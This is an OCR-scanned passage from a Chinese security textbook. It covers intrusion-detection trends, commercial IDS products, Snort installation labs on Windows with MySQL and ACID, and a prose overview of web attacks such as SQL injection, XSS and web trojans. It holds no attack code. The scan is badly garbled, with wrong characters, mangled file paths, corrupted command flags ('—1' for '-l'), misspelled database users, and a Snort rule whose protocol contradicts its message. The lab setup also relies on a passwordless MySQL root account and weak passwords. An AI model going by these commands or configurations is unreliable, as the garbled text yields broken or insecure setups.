G) 入 侵 或 攻击 的 规模 扩大 。 由 于 战争 对 电子 技术 与 网 络 技术 的 依赖 性 越 来 越 大 , 随 
之 产生 发展. 逐步 升级 到 电子 战 与 信息 战 。 对 于 信息 战 ,无 论 其 规模 还 是 技术 ,都 与 一 般 意 
义 上 的 计算 机 网 络 的 入 侵 与 攻击 不 可 相提并论 。 

(4) 入 侵 或 攻击 技术 的 分 布 化 。 以 往常 用 的 入 侵 与 攻击 行为 往往 由 单机 执行 。 防 范 技 
术 的 发 展 使 得 此 类 行为 不 能 奏效 ,分 布 式 攻击 是 近期 最 常用 的 攻击 手段 , 它 能 在 很 短 时 间 内 
造成 被 攻击 主机 的 竣 疾 , 且 此 类 分 布 式 攻击 的 单机 信息 模式 与 正常 通信 无 差异 ,往往 在 攻击 
发 动 的 初期 不 易 被 确认 。 

(5) 攻击 对 象 的 转移 。 入 侵 与 攻击 常 以 网 络 为 侵犯 主体 ,但 近期 来 的 攻击 行为 却 发 生 
了 策略 性 的 改变 ,由 攻击 网 络 改 为 攻击 网 络 的 防护 系统 。 现 在 已 有 专门 针对 IDS 攻击 的 报 
道 ,攻击 者 详细 分 析 了 IDS 的 审计 方式 .特征 描述 .通信 模式 , 找 出 IDS 的 弱点 ,然后 加 以 
攻击 。 


2. 入 食 检 测 技术 的 发 展 方向 


今后 的 入 侵 检 测 技术 大 致 可 朝 下 述 3 个 方向 发 展 。 

(1) 分 布 式 人 侵 检测 : 第 一 层 含义 即 针对 分 布 式 网 络 攻击 的 检测 方法 ; 第 二 层 含义 即 
使 用 分 布 式 的 方法 来 检测 分 布 式 的 攻击 ,其 中 的 关键 技术 为 检测 信息 的 协同 处 理 与 人 侵 攻 
击 的 全 局 信息 的 提取 。 

(2) 智能 化 人 侵 检测 : 即使 用 智能 化 的 方法 与 手段 进行 人 侵 检 测 。 所 谓 的 智能 化 方 
法 , 现 阶段 常用 的 有 神经 网 络 、. 遗 传 算法 、 模 糊 技术 、 免 疫 原理 等 ,这 些 方法 常用 于 和 人 侵 特 征 


实践 


的 辨识 与 汉化 。 

(3) 全 面 的 安全 防御 方案 : 即使 用 安全 工程 风险 管理 的 思想 与 方法 来 处 理 网 络 安 全 问 
题 ,将 网 络 安全 作为 一 个 整体 工程 来 处 理 。 从 管理 网络 结 构 、 加 密 通 道 、 防 火 墙 病毒 防护 
及 入 侵 检 测 多 方位 全 面 对 所 关注 的 网 络 全 面 评估 ,然后 提出 可 行 的 全 面 解决 方案 。 


12.4 主要 的 IDS 公司 及 其 产品 


目前 国内 外 已 有 很 多 公司 开发 人 侵 检测 系统 ,有 的 作为 独立 的 产品 ,有 的 作为 防火 墙 的 
一 部 分 ,其 结构 和 功能 也 不 尽 相 同 。 非 商业 化 的 产品 有 如 Snort 这 一 类 的 自由 软件 ; 优秀 
的 商业 产品 有 如 ISS 公司 的 RealSecure 是 分 布 式 的 入 侵 检 测 系 统 , Cisco 公司 的 
NetRanger, NAI 公司 的 CyberCop 是 基于 网 络 的 入 侵 检 测 系 统 , Trusted Information 
System 公司 的 Stalkers 是 基于 主机 的 检测 系统 。 


12.4.1 RealSecure 


RealSecure 是 目前 使 用 范围 较 广 的 商用 入 侵 检测 系统 , 它 分 为 引擎 和 控制 台 。 引 擎 也 
就 是 检测 器 。 引 擎 有 Windows NT 和 UNIX 两 个 版 本 , 控制 台 则 是 运行 在 Windows NT 
系统 上 。 安 装 好 之 后 , 策略 由 分 析 员 来 制定 ,RealSecure 重新 定义 完 策略 后 不 需 重新 启动 
引擎 , 它 的 默认 设置 就 能 够 检测 到 大 量 的 有 用 信息 , 报告 也 相当 不 错 , 是 目前 比较 直观 、 界 
面 非常 友好 的 和 人 侵 检测 系统 。 


12.4.2 NetRanger 


NetRanger 包括 检测 器 和 分 析 工 作 站 , 这 些 组 件 之 间 通 过 特殊 的 协议 进行 通信 , 它 的 
检测 器 被 设计 成 可 以 检测 Cisco 路 由 器 的 系统 纪录 和 数据 包 , 这 是 所 有 商业 版 本 中 能 力 最 
强 的 一 种 , 而且 还 支持 数据 包 的 装配 功能 , 这 样 即使 攻击 在 不 同 的 分 段 中 也 能 检测 出 来 。 
但 是 也 有 不 利 因素 ,如 系统 成 本 较 高 。 

入 侵 检 测 作 为 一 种 积极 主动 地 安全 防护 技术 ,提供 了 对 内 部 攻击 、 外 部 攻击 和 误 操 作 的 
实时 保护 ,在 网 络 系统 受到 危害 之 前 拦截 和 响应 入 侵 。 从 网 络 安 全 立体 纵深 、 多 层次 防御 的 
角度 出 发 ,入 侵 检 测 理应 受到 人 们 的 高 度 重视 ,这 从 国外 入 侵 检测 产品 市 场 的 鞍 勃 发 展 就 可 
以 看 出 。 在 国内 , 随 着 上 网 的 关键 部 门 .关键 业务 越 来 越 多 ,迫切 需要 具有 自主 版 权 的 入 侵 
检测 产品 。 但 现状 是 入 侵 检 测 仅 仅 停留 在 研究 和 实验 样品 阶段 ,或 者 是 防火 墙 中 集成 较为 
初级 的 入侵 检测 模块 。 可 见 , 入 侵 检测 产品 仍 具有 较 大 的 发 展 空间 ,从 技术 途径 来 讲 , 除 了 
完善 常规 的 、 传 统 的 技术 (模式 识别 和 完整 性 检测 ) 外 ,应 重点 加 强 统计 分 析 的 相关 技术 
研究 。 


12.4.3 Snort 


Snort 是 一 个 免费 的 、 跨 平台 的 软件 包 , 用 做 监视 小 型 TCP/IP 网 的 嗅 探 器 、 日 志 记 录 、 


侵入 探测 器 。 它 被 设计 用 来 填补 昂贵 的 、 探 测 繁重 的 网 络 侵入 情况 的 系统 留 下 的 空缺 ,可 以 
运行 在 Linux/UNIX 和 Windows 系统 中 。Snort 有 3 种 主要 模式 : 信息 包 嗅 探 器 、 信 息 包 
记录 器 或 成 熟 的 侵入 探测 系统 。 遵 循 开发 /自由 软件 最 重要 的 惯例 ,Snort 支持 各 种 形式 的 
插件 .扩充 和 定制 ,包括 数据 库 或 XML 记录 、 小 帧 探测 和 统计 的 异常 探测 等 。 


Snort 的 安装 与 使 用 


【实验 目的 】 

(1) 理解 IDS 的 原理 和 工作 方式 。 

(2) 熟悉 入 侵 检测 工具 Snort 在 Windows 操作 系统 中 的 安装 和 配置 方法 。 

(3) 掌握 Snort 进行 人 侵 检测 的 过 程 和 方法 。 

【实验 内 容 】 

安装 Snort, 操 作 如 下 。 

(1) 登录 网 站 http://www. winpcap. org/install/default. htm 下 载 winpcap4_0_1 并 
安装 。 

(2) 登录 网 站 http://www. snort. org/dl/ 选 择 Binaries: (Click to view binaries) 。 

(4) Snort 是 基于 命令 行 方式 的 ,在 dos command 窗口 里 面 运行 ,snort. exe 默认 路 径 
为 C:\Snort\bin。 

(5) 用 记事 本 打开 并 修改 C: NSnortVeteNsnort. conf 文件 , 原 代 码 如 下 。 


include classification. config 
include reference. config 


改 为 绝对 路 径 代 码 如 下 。 


include c:\snort\etc\classification. config 
include c:\snort\etc\reference. config 


(6) 测试 Snort 是 否 正 常 工 作 代 码 如 下 
c:\snort\bin> snort -c "c:\snort\etc\snort.conf" —1 "c:\snort\logs" -d -e 


【参数 说 明 】 

-X 参数 用 于 在 数据 链接 层 记录 raw packet 数据 。 

。 -d 参数 记录 应 用 层 的 数据 。 

* ce 参数 显示 /记录 第 二 层 报 文 头 数据 。 

。 -Cc 参数 用 以 指定 Snort 的 配置 文件 的 路 径 。 

(7) 安装 Snort rule, fE Snort 网 站 下 载 rule 规则 ,将 其 rule, doc 目录 覆盖 到 C:\Snort\ 
rule\\C:\CnortN\doc。 

(8) 进入 cmd 命令 窗口 ,切换 到 Snort 安装 目录 ,例如 C:\Snort\bin 下 运行 如 下 命令 。 


snort —c "c:\snort\etc\snort. conf" —1 "c:VsnortMogs" -d 


运行 后 不 要 关闭 窗口 。 


实践 


(9) 使 用 Snort 进行 检测 ,并 查看 检测 结果 并 截图 ,最 后 给 出 分 析 报告 。 
【实验 要 求 】 

CD 完成 上 述 实 验 内 容 。 

(2) 记录 所 做 实验 的 内 容 、 步 骤 及 结果 。 

(3) 熟悉 Snort 的 安装 ,配置 内 容 及 方法 。 

(4) 编写 并 提交 书面 实验 报告 。 


ELSPA 基于 Windows 控制 台 的 入 侵 检 测 系统 配置 


【实验 目的 】 
学 会 搭建 Snort 十 Windows 十 MySQL 十 PHP 十 ACID 的 网 络 和 人 侵 检测 系统 平台 ,并 学 


习 简 单 Snort 规则 的 编写 与 使 用 ,了 解 Snort 的 检测 原理 。 


3.2 


【实验 内 容 】 

(1) Apache 2. 0. 46 的 安装 与 配置 。 
(2) PHP-4. 3. 2 的 安装 与 配置 。 

(3) Snort2. 8 的 安装 与 配置 。 

(4) MySQL 数据 库 的 安装 与 配置 。 
(5) Adodb 的 安装 与 配置 。 

(6) 数据 控制 台 ACID 的 安装 与 配置 。 
(7) jpgraph 库 的 安装 。 

(8) winpcap 的 安装 与 配置 。 

(9) Snort 规则 的 配置 。 

(10) 测试 Snort 的 入 侵 检测 相关 功能 。 
【实验 条 件 】 

联网 的 装 有 Windows 2000 或 Windows XP 操作 系统 的 PC; Apache_2. 0. 46, PHP-4. 


\Snort2. 8, MySQL, Adodb, ACID, jpgraph FE X winpcap 等 软件 。 


【实验 步骤 】 
1. Windows 环境 下 安装 Snort 


(1) 安装 Apache_2. 0. 46。 
(D 双击 Apache_2. 0. 46-win32-x86-no_src. msi, 将 其 安装 在 默认 文件 夹 下 ,安装 程序 


会 在 该 文件 夹 下 自动 产生 一 个 子 文件 夹 apache2 。 


© 打开 配置 文件 C:\apache\apache2\conf\httpd. conf, 将 其 中 的 Listen 8080 git Jg 


Listen 50080。 这 主要 是 为 了 避免 冲突 。 


© 在 “运行 "对话 框 中 中 输入 emd.fE Enter 键 进入 命令 行 运 行 方式 , 转 入 C:\apache\ 


apache\bin 子 目 录 , 输 入 如 下 命令 将 apache 设置 为 以 Windows 中 的 服务 方式 运行 。 


C:\apache\apache2\bin> apache -k install 


(2) 安装 PHP, 

CD 解压 缩 PHP-4. 3. 2-Win32. zip 至 C:\php。 

© 复制 C:\php 下 的 php4ts. dll 至 % systemroot \ System32. & (B| php. ini-dist 至 
P systemroot %\php. ini, 

© 添加 gd 图 形 支持 库 , 在 php. ini 中 添加 extension php. gd2. dll, AE php. ini 中 有 
Y] ,将 此 句 前 面 的 ;注释 符 去 掉 。 

QD 添加 Apache 对 PHP 的 支持 。 在 C:\apahce\apache2\conf\httpd. conf 中 添加 如 下 
命令 。 

LoadModule php4 module "C:/php/sapi/php4apache2. d11" 

AddType application/x- httpd- php . php 


进入 命令 行 运行 方式 ,输入 如 下 命令 启动 Apache Web 服务 。 
Net start apache2 


© 在 C:\apache\apche2\htdocs 目录 下 新 建 test. php 测试 文件 ,test. php 文件 内 容 为 
“<? phpinfo();? >”, 

使 用 http://127. 0. 0. 1:50080/test. php 测试 PHP 是 否 成 功 安装 ,如 成 功 安 装 , 则 在 浏 
览 器 中 会 出 现 如 图 12-6 所 示 的 网 页 


System Windows NT C6E3F998206843151 build 2600 

Build Date May 20 2003150505 

Server API Apache 2.0 Handler. 

|Virtual Directory Support. enabled 

Configuration File (php.ini) Path |C WINCOWSWhE Ini 

PHP API 20020018 

PHP Extension 20020429 

Zend Extension 20021010 

Debug Build no 

Thread Safety enabled 

Registered PHP Streams. php, hip, fip, compress zlib 
图 12-6 安装 成 功 


(3) 安装 Snort。 

参考 实验 12-2。 

(4) 安装 配置 MySQL 数据 库 。 

D 安装 MySQL 到 上 默认 文件 夹 C:\mysql, 并 在 命令 行 方式 下 进入 C:\mysql\bin ,输入 
如 下 命令 。 


C:\mysql\bin\mysqld -- install 
这 将 使 MySQL 在 Windows 中 以 服务 方式 运行 。 


© 在 命令 行 方式 下 输入 net start mysql 命令 ,启动 MySQL 服务 。 
@ 进入 命令 行 方式 ,输入 如 下 命令 。 


300 tense msn (E) 


C: Vmysq1Nbin> mysql -u root -p 


运行 结果 如 图 12-7 所 示 。 


smysqlsbin?mysgl -u root -p 
inter password: 
i or 


ype "help;' or ’\h’ for help. Ty to clear the buffer. 


图 12-7 运行 结果 


@ 出 现 Enter Password 提示 符 后 直接 按 Enter 键 ,以 默认 的 没有 密码 的 root 用 户 登 
录 mysql 数据 库 。 
© 在 MySQL 提示 符 后 输入 如 下 命令 ,(Mysql>) 表 示 屏 幕 上 出 现 的 提示 符 , 下 同 。 


(Mysql >)create database snort; 
(Mysq1 >)create database snort archive; 


注意 : 输入 分 号 后 MySQL 才 会 编译 执行 语句 。 

create 语句 建立 了 Snort 运行 必需 的 Snort 数据 库 和 snort_archive 数据 库 。 

© 输入 quit 命令 退出 MySQL ,在 出 现 的 提示 符 之 后 输入 如 下 命令 。 

(c:\mysql\bin>)Mysql - D snort — u root -— p< C:\snort\contrib\create_mysql (c:\mysql\bin >) 

Mysql - D snort archive — u root - p<C:\snort\contrib\create_mysql 

两 个 语句 表示 以 root 用 户 身份 ,使 用 C:\snort\contrib 目录 下 的 create mysql 脚本 文 
件 , 在 snort 数据 库 和 snort_archive 数据 库 中 建立 了 snort 运行 必须 的 数据 表 。 

注意 : 在 此 形式 输入 的 命令 后 没有 “; ” 

© 屏幕 上 出 现 密码 输入 提示 ,由 于 这 里 是 用 的 是 没有 密码 的 root 用 户 , 直 接 按 Enter 
键 即 可 。 

@ 再 次 以 root 用 户 身份 登录 MySQL 数据 库 ,在 提示 符 后 输入 如 下 语句 。 

(mysql»)grant usage on *. * to "acid"@"loacalhost" identified by "acidtest"; 

(mysql >)grant usage on * . * to "snort"(Q"loacalhost" identified by "snorttest"; 

两 个 语句 表示 在 本 地 数据 库 中 建立 acid( 密 码 为 acidtest) 和 snort( 密 码 为 snorttet) 两 
个 用 户 , 以 备 后 面 使 用 。 

(9 在 MySQL 提示 符 后 面 输入 如 下 语句 ,为 新 建 的 用 户 在 snort 和 snort_archive 数据 
库 中 分 配 权限 。 

(mysql >)grant select, insert, update, delete, create,alter on snort. * to "adid"@"localhost; 

(mysql >)grant select, insert on snort. * to "snort"(@ "localhost; 


(mysq1 >) grant select, insert, update, delete, create, alter on snort archive. * to "adid" @" 


localhost; 


(5) 安装 Adodb。 
将 adodb360. zip 解压 缩 至 C:\php\adodb 目录 下 , 即 完成 了 Adodb 的 安装 。 
(6) 安装 配置 数据 控制 台 ACID, 
CD 解压 缩 acid-0. 9. 6b23. tat. gz 至 C: NapacheVapache2MhtdocsVacid 目录 下 。 
© 修改 C: NapahceVapache2Vhtdocs 下 的 acid. conf. php 文件 ,如 下 。 

DBlib path = "C:VphpNVadodb" ; 


$ DBtype = "mysql"; 
$alert dbname = "snort"; 


$alert host 7 "localhost"; 
$alert port - "3306"; 
$alert user 7 "acid"; 


$alert password = "acidtest"; 
/ * Archive DB connection parameters * / 
$ archive dbname = "snort archive"; 


$ archive host = "localhost"; 
$ archive port = "3306"; 
$ archive user = "acid"; 


$archive password = "acidtest"; 
$ ChartLib path- "C: VphpV jpgraphVsrc" ; 


注意 : 修改 时 要 将 文件 中 原来 的 对 应 内 容 注 释 删 掉 , 或 者 直接 覆盖 。 
© 查看 http://127. 0. 0. 1:50080/acid/acid db setup. php 网 页 ,如 图 12-8 所 示 , 单 击 


Create ACID AG 按钮 建立 数据 库 。 


AG Maintenance 


[Back] 
ACID tables Adds tables tc extend the Snort DB to support the ACID functionality Create ACID AG 


Search Indexes. (o ica) Adde indexes to the Snort DB to optimiza the speed cf tho queries DONE 


[Loaded in 1 seconds] 


Roman Danyliw AirCERT 


i 


& 4D Intaraet 
图 12-8 完成 安装 ACID 

(7) 安装 jpgraph E. 

CD 解压 缩 jpgraph-1. 12. 2. tar. gz 至 C:\php\jpgraph。 

@ 修改 C:\php\jpgrah\src 下 的 jpgraph. php 文件 ,去 掉 如 下 语句 的 注释 。 


> 


0 


[9] 


temas msn (Ey 


DEFINE( "CACHE_DIR", "/tmp/jpgraph cache/"); 


(8) 安装 winpcap。 

CD 安装 默认 选项 和 默认 路 径 安 装 winpcap。 

配置 并 启动 Snort。 

© 打开 C:\snort\etc\snort. conf 文件 ,修改 文件 中 的 如 下 语句 。 


include classification. config 
include reference. config 


修改 为 绝对 路 径 ,语句 如 下 。 
include C:\snort\etc\classfication. config include C:\snort\etc\reference. config 
在 该 文件 的 最 后 加 入 如 下 语句 


Output database: alert, mysql, host = localhost user = snort password = snorttest dbname = snort 
encoding = hex detail = full 


@ 进入 命令 行 方式 ,输入 如 下 命令 启动 Snort。 
C:\snort\bin> snort -c "C:\snort\etc\snort. conf" -1 "C:\snort\log" -d -e -X 


如 果 Snort 正常 运行 ,系统 最 后 将 显示 如 图 12-9 所 示 


typa=Both 


type=Both trackis 


[ule application ord dacti n-Jdynanic-Jalert->pi 


== Initialization Complete == 


图 12-9 启动 Snort 


© 打开 http://127. 0.0. 1:50080/acid/acid_main. php 网 页 ,进入 ACID 分 析 控 制 台 主 
界面 。 如 果 上 述 配置 均 正 确 , 将 出 现 如 图 12-10 所 示 的 页 面 。 


2. Windows 环境 下 使 用 Snort 


(1) 完善 配置 文件 。 

(D 打开 C:\snort\etc\snort. conf 文件 。 

@ 配置 Snort 的 内 、 外 网 检测 范围 。 

(3) 将 snort. conf 文件 中 var Home NET any 语句 中 的 any 改 为 自己 所 在 的 子 网 地 址 ， 
即将 Snort 监测 的 内 网 设置 为 本 机 所 在 局 域 网 。 如 本 地 IP 为 192. 168. 1. 10 , 则 将 any 改 为 


Addad D alert(s) to the Alert cache 


Queried on : Thu December 14, 2006 00:04:56 

Database: snort@locəlhost 3305 (schema version: 106) 

Time window: no alerts derected 
Sensors: 0 raffic Profile by Protocol 
Unique Alerts: 0 ( 0 categories TCP (0%) 


Total Number of Alerts: 0 UDP (05) 


e Source IP addresses: 8 s —-——— mv 
* Dest. IP addresses: D ICMP (055) 
* Unique IP links 0 


e Source Ports 0 Portscan Traffic (0%) 
o TCP (0) UDP (0) 

* Dest. Ports; 0 
o TCP (0) UDP (0) 


* Search 
* Graph Alert data 


a Snanshat 
[ Bo 


图 12-10 配置 正确 


192. 168. 1. 0/24。 

@ 将 var EXTERNAL NET any 语句 中 的 any 改 为 1192. 168. 1. 1/24 ,即将 Snort Wi 
测 的 外 网 改 为 本 机 所 在 局 域 网 以 外 的 网 络 。 

© 设置 监测 包含 规则 。 

© 找到 snort. conf 文件 中 描述 规则 的 部 分 ,前 面 加 * # ”表示 该 规则 没有 启用 ,将 local. 
rules 之 前 的 “# "去掉 ,其 余 规则 保持 不 变 。 

O 使 用 控制 台 查看 结果 。 

(2) 配置 Snort 规则 。 

(D 打开 C:\snort\rules\ local. rules 文件 。 

@ 在 规则 中 添加 一 条 语句 ,实现 对 内 网 的 UDP 协议 相关 流量 进行 检测 ,并 报警 udp 
ids/dns-version-query。 语 句 如 下 。 


Alert tcp any any -> $ Home NET any(msg:"udp ids/dns — version - query" ;content:"version";) 


© 重启 Snort 和 ACID 检测 控制 台 ,使 规则 生效 。 


mi 


e 
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13.1 概述 


随 着 Web 2. 0 REZEK 、 微 博 等 一 系列 新 型 的 互联 网 产品 的 诞生 ， 
基于 Web 环境 的 互联 网 应 用 越 来 越 广泛 ,企业 信息 化 的 过 程 中 各 种 应 用 
都 架设 在 Web 平台 上 ,Web 业务 的 迅速 发 展 也 引起 黑客 们 的 强烈 关注 ， 
接 踊 而 至 的 就 是 Web 安全 威胁 的 凸显 ,黑客 利用 网 站 操作 系统 的 漏洞 和 
Web 服务 程序 的 SQL 注入 漏洞 等 得 到 Web 服务 器 的 控制 权限 , 轻 则 自 
改 网 页 内 容 , 重 则 窃取 重要 内 部 数据 ,更 为 严重 的 则 是 在 网 页 中 植 人 恶 
意 代码 ,使 得 网 站 访问 者 受到 侵害 。 这 也 使 得 越 来 越 多 的 用 户 关 注 应 用 
层 的 安全 问题 ,对 Web 应 用 安全 的 关注 度 也 逐渐 升温 。 

目前 很 多 业务 都 依赖 于 互联 网 ,例如 网 上 银行 网络 购物 、 网 游 等 ， 
很 多 恶意 攻击 者 出 于 不 良 的 目的 对 Web 服务 器 进行 攻击 ,想方设法 通 
过 各 种 手段 获取 他 人 的 个 人 账户 信息 谋取 利益 。 正 是 因为 这 样 , Web 业 
务 平台 最 容易 遭受 攻击 。 同 时 ,对 Web 服务 器 的 攻击 也 是 形形色色 、 种 
类 繁多 ,常见 的 有 挂 马 、SQL 注入 、 缓 冲 区 溢出 、 嗅 探 、 利 用 TIS 等 针对 
Web Server 漏洞 进行 的 攻击 。 

一 方面 ,由 于 TCP/IP 的 设计 没有 周详 的 考虑 安全 问题 ,使 得 在 网 
络 上 传输 的 数据 缺少 必要 的 安全 防护 。 攻 击 者 可 以 利用 系统 漏洞 造成 
系统 进程 缓冲 区 溢出 ,获得 或 者 提升 自己 在 有 漏洞 的 系统 上 的 用 户 权 
Wit ,来 运行 任意 程序 ,甚至 安装 和 运行 恶意 代码 ,窃取 机 密 数 据 。 而 应 用 
软件 在 开发 过 程 中 也 没有 过 多 考虑 到 安全 的 问题 ,使 得 程序 本 身 存 在 很 
多 漏洞 ,诸如 缓冲 区 溢出 、SQL 注入 等 流行 的 应 用 层 攻 击 , 这 些 均 属于 在 
软件 研发 过 程 中 朴 忽 了 对 安全 的 考虑 所 致 。 

另 一 方面 ,用 户 对 某 些 隐秘 的 东西 带 有 强烈 的 好 奇 心 ,一 些 利 用 木 
马 或 病毒 程序 进行 攻击 的 攻击 者 ,往往 就 利用 了 用 户 的 这 种 好 奇 心理 ， 
将 木马 或 病毒 程序 捆绑 在 一 些 艳 丽 的 图 片 . 音 视频 及 免费 软件 等 文件 
中 ,然后 把 这 些 文件 置 于 某 些 网 站 当中 ,再 引诱 用 户 去 单 击 或 下 载运 行 。 
或 者 通过 电子 邮件 附件 和 QQ MSN 等 即时 聊天 软件 将 这 些 捆绑 了 木马 
或 病毒 的 文件 发 送 给 用 户 ,利用 用 户 的 好 奇 心理 引诱 用 户 打开 或 运行 这 
些 文件 。 


13.2 Web 安全 概念 
13.2.1 Web 服务 


Web 服务 是 指 采用 B/S 架构 .通过 HTTP 协议 提供 服务 的 统称 ,这 种 结构 也 称 为 Web 
架构 , 随 着 Web 2.0 的 发 展 ,出 现 了 数据 与 服务 处 理 分 离 、 服 务 与 数据 分 布 式 等 变化 ,其 交 
互 性 能 也 大 大 增强 ,也 有 人 叫 B/S/D 三 层 结 构 。 互 联网 能 够 快速 流行 得 益 于 Web 部 署 上 
的 简单 ,开发 上 简便 。Web 网 页 的 开发 大 军 迅 速 超过 了 以 往 任何 计算 机 语言 的 爱好 者 , 普 
及 带 来 了 应 用 上 的 繁荣 。J2EE 与 . NET 的 殊途同归 ,为 Web 的 流行 扫 清 了 厂家 与 标准 的 
差异 。 新 业务 系统 的 开发 中 已 经 有 越 来 越 多 的 系统 架构 师 选择 了 Web 架构 。 事 实 再 一 次 
证 明了 简洁 的 最 容易 流行 。 

简单 与 安全 总 有 些 * 了 矛盾 ” ,浏览 器 可 以 直接 看 到 页 面 的 HTML 代码 ,早期 的 Web 服务 
设计 没有 过 多 的 安全 考虑 ,但 随 着 Web 2.0 的 广泛 使 用 , Web 服务 不 再 只 是 信息 发 布 , 在 网 
上 可 以 进行 的 例如 网 上 购物 ,政府 行政 审批 .企业 资源 管理 以 及 游戏 装备 交易 等 信息 价值 的 
诱惑 ,使 得 安全 问题 日 显 突出 了 。 

在 网 站 页 面 被 算 改 方面 ,2007 4E, CNCERT/CC 监测 到 中 国内 地 被 自 改 网 站 总 数 达 到 
24477 个 ,与 去 年 同期 相 比 增长 接近 一 倍 ,其 中 . gov 网 站 被 算 改 数量 为 3831 个 , 占 整个 大 
陆地 区 被 自 改 网 站 的 16%。 政 府 网 站 被 频繁 入 侵 ,不 仅 极 大 影响 了 政府 形象 ,也 体现 出 我 
国 在 电子 政务 发 展 中 遇 到 严重 的 安全 隐患 。WWW 攻击 已 经 成 为 最 主要 的 网 络 攻 击 方式 
gs 


13.2.2 Web 架构 


要 保护 Web 服务 , 先 要 了 解 Web 系统 架构 ,图 13-1 所 示 是 Web 服务 的 一 般 性 结构 图 ， 
适用 于 互联 网 上 的 网 站 ,也 适用 于 企业 内 网 上 的 Web 应 用 架构 。 

用 户 使 用 通用 的 Web 浏览 器 ,通过 接 入 网 络 连 接 到 Web 服务 器 上 。 用 户 发 出 请 求 , 服 
务 器 根据 请 求 的 URL 地 址 连接 ,找到 对 应 的 网 页 文件 ,发 送 给 用 户 ,两 者 对 话 的 “官方 语 
言 " 是 http。 网 页 文件 是 用 文本 描述 的 ,是 HTML/Xml 格式 ,用 户 浏览 器 中 有 个 解释 器 把 
这 些 文本 描述 的 页 面 恢复 成 图 文 并 茂 \ 有 声 有 影 的 可 视 页 面 。 

通常 情况 下 ,用 户 要 访问 的 页 面 都 存在 于 Web 服务 器 的 某 个 固定 目录 下 ,是 一 些 . html 
IR. xml 文件 ,用 户 通 过 页 面 上 的 超 链接 可 以 在 网 站 页 面 之 间 跳 跃 ,这 就 是 静态 的 网 页 。 后 
来 人 们 觉得 这 种 方式 只 能 单 向 地 给 用 户 展示 信息 ,但 让 用 户 做 一 些 比如 身份 认证 、 投 票选 举 
之 类 的 事情 就 比较 麻烦 ,由 此 产生 了 动态 网 页 的 概念 。 所 谓 动态 ,就 是 利用 PHP, ASP. 
NET JSP 等 在 网 页 中 嵌入 一 些 可 运行 的 “小 程序 ”用 户 浏览 器 在 解释 页 面 时 ,看 到 这 些小 
程序 就 启动 运行 它 。 小 程序 的 用 法 很 灵活 ,可 以 在 PC 上 生成 一 个 文件 ,或 者 接收 用 户 输入 
的 一 段 信息 ,这样 就 可 以 根据 用 户 自己 的 “想法 ?对 页 面 进行 定制 处 理 , 让 用 户 每 次 来 到 时 ， 
看 到 的 是 自己 上 次 设计 好 的 特定 风格 。 

“小 程序 ”的 使 用 让 Web 服务 模式 有 了 “双向 交流 ”的 能 力 , Web 服务 模式 也 可 以 像 传 


实践 


统 软件 一 样 进行 各 种 事务 处 理 , 如 编辑 文件 .利息 计算 、 提 交 表 格 等 , Web 架构 的 适用 面 得 
以 大 大 扩展 。 


yz > .php „asp .jsp… 


BASE s 
i Lj ZUM OOHIMLR 用 户 


P 4 
48 ka 
.html xml AN: 静态 、 动态 之 一 -一 
数据 库 
= - 


«php. asp. jsp*** 
(URL) 


图 13-1 Web 系统 架构 示意 图 


13.2.3 Web 攻击 


入 侵 者 进入 Web 系统 ,其 动作 行为 目的 性 是 十 分 明确 的 。 

CD 让 网 站 瘫痪 : 网 站 瘫痪 即 是 服务 中 断 。 使 用 DDoS 攻击 都 可 以 让 网 站 瘫痪 ,但 对 
Web 服务 内 部 没有 损害 ; 而 网 络 和 人 侵 可 以 删除 文件 .停止 进程 ,让 Web 服务 器 彻底 无 法 恢 
复 。 一 般 来 说 ,这 种 做 法 是 索要 金钱 或 恶意 竞争 的 要 挟 , 也 可 能 是 技术 的 显示 ,利用 网 站 被 
攻击 作为 宣传 工具 。 

(2) 算 改 网 页 : 修改 网 站 的 页 面 显示 ,是 相对 比较 容易 的 ,也 是 公众 容易 知道 的 攻击 效 
果 。 对 于 攻击 者 来 说 ,没有 什么 “实惠 ”好 处 ,主要 是 炫 炊 自 己 ,当然 对 于 政府 等 网 站 ,形象 问 
题 是 很 重要 的 。 

(3) ERE, 这 种 入 侵 对 网 站 不 会 产生 直接 破坏 ,而 是 对 访问 网 站 的 用 户 进 行 攻击 , 挂 
木马 的 最 大 “实惠 ”是 收集 僵尸 网 络 的 “僵尸 主机 ”, 一 个 知名 网 站 的 首页 传播 木马 的 速度 是 
爆炸 式 的 。 挂 木马 容易 被 网 站 管理 者 发 觉 ,XSS( 跨 站 攻击 ) 是 新 的 倾向 。 

(4) 算 改 数据 : 这 是 最 危险 的 攻击 者 , 自 改 网 站 数据 库 或 者 动态 页 面 的 控制 程序 ,表面 
上 没有 什么 变化 ,很 不 容易 发 觉 ,是 最 常见 的 经 济 利益 人 侵 。 数 据 自 改 的 危害 是 难以 估量 
的 ,比如 购物 网 站 可 以 修改 用 户 账号 金额 或 交易 记录 ,政府 审批 网 站 可 以 修改 行政 审批 结 
果 , 企 业 ERP 可 以 修改 销售 订单 或 成 交 价格 , 等 等 。 采 用 加 密 (如 https 协议 ) 可 以 防止 入 
侵 的 说 法 并 不 准确 。 首 先 Web 服务 是 面向 大 众 的 ,不 可 以 完全 使 用 加 密 方 式 ,在 企业 内 部 
的 Web 服务 上 可 以 采用 ,但 大 家 都 是 “内 部 人 员 ”, 加 密 方式 是 共 知 的 ; 其 次 ,加 密 可 以 防止 
SIL ACHSE ET ELA EE RT LR EIE HU IP ,一 样 可 以 入 侵 ; 再 者 “中间人 劫持 攻击 同样 可 


以 窃听 加 密 的 通信 。 
13.2.4 常见 的 Web 攻击 种 类 


1. SQL 注入 


SQL 注入 指 通过 把 SQL 命令 插入 Web 表单 递交 或 输入 域名 或 页 面 请 求 的 查询 字符 
串 ,最 终 达 到 欺骗 服务 器 执行 恶意 的 SQL 命令 ,比如 很 多 影视 网 站 泄露 VIP 会 员 密码 大 多 
就 是 通过 Web 表单 递交 查询 字符 暴 出 的 ,这 类 表单 特别 容易 受到 SQL 注入 式 攻击 。 


2. 跨 站 脚本 攻击 


跨 站 脚本 攻击 (XSS) 指 利用 网 站 漏洞 从 用 户 那 里 恶意 盗 取信 息 。 用 户 在 浏览 网 站 、 使 
用 即时 通信 软件 ,甚至 在 阅读 电子 邮件 时 ,通常 会 单 击 其 中 的 链接 。 攻 击 者 通过 在 链接 中 插 
入 恶意 代码 , 资 取 用 户 信息 。 


3. 网 页 挂 马 


网 页 挂 马 是 把 一 个 木马 程序 上 传 到 一 个 网 站 里 面 , 然 后 用 木马 生成 器 生 一 个 网 马 , 再 上 
传 到 空间 里 面 , 再 加 代码 使 得 木马 在 打开 网 页 里 运行 。 


